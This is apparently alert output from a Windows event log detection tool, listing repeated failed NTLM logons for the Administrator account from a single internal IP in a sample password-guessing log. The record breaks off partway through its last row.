+2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LLTReOoxRa7UAhT3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqtqwAPBiBfaHNpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmisFXzDpOILUhIX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W5UHqVVAYK08FWit | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKHLHN59FDnD92Sm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ohAKPRGvg1JCQ91y | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxdcrng84HEG39nJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lFGXFxHPbxDTGmiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tyFnafBgzoLQWTQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2IjLjxkd2pX4moFy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9vqYC4KotCYTcQv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: qtHcYFIOHglQFb60 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmiHIQrpsAVRJtdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4TdkChjMAviJ6jr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPIGU1rBk0F5cG9P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ScynGWKK3CtoUsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0E4JAuxC8MuuGfnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4aDJtqsUWKyuDqBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCFrEHUgqCtKPybS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ftrEBfaLGbboV8D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: thle3slH6gZYllyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PcEnabS7oj98WI0e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EBqGp9CD4A9PsyLk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iil8dQlzMCkKRNUb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nDBqxF9bmNNjNdsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJNBRV3BRVEN8hmG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OGl1Tbdw7PDvVsRR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uspHTc4JwnjjZQti | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 8Exq3nfy1LeFOPcA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vdFC4g7vsLO0zOzL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HpdCohLheoqQ6DXw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHS3sclMwgHuH8rE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sNSheImuQwgOEH5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GX5y374mlYYXbAB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaFRL6q9KQY5bFHZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrkEyJmfLiSrvQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fd1vJiJa3pdjqdQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RVrZl3LOIa7VLhT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TKR8KbyQkwRX1qTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GY22XuDxbE5lvEra | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4AntiX3j9HLHcOOq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIvMbod41WeNADy5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0UL4lb3CCrv7YfGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OyRktDjPqFyrdSTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKEGmAH8Wbc7f3jC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 06Dfi4lO2Vdw3gCr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29eXmenUTACkAHKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Zq7Gl6hnKDJJqFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jKENlWYt6m78taZR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 822SUU2Hg6w6AqQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bROU0Mk9Z4yEq323 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKfVPleDpLLqkuKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NGWVqbchMitnLVYT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7K9vifU9lWwpP9J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIgKYj210JfICJXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jisuKilPQivTV8yE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hckyoom0XnqpRzK8 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: De0l6qgcuhMERjMY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SSa7pylPWn8jl2Ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ol9OntO4hqidlNUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kXOBF0ZWLxMauHuT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVBFJltkR5vnmpYD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: kHVXEHq9zNYdfTpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OIw3BxmLsfwDXXFg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hhgRhjnhkRJus4fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xz78guWXrekEvuFT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 04wNT26RJmriQrfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XmbuuymdSpfNldt2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yqJarBVOImq5Tn2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BZYExQroYH65tPuG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llU5DQBrIrV3VtG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HV17iXOYQqs2ntax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esZnEeyGdPa22PsL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rlYFTP9a2wdi5A2n | IP Addr: 192.168.198.149 | AuthPackage: 
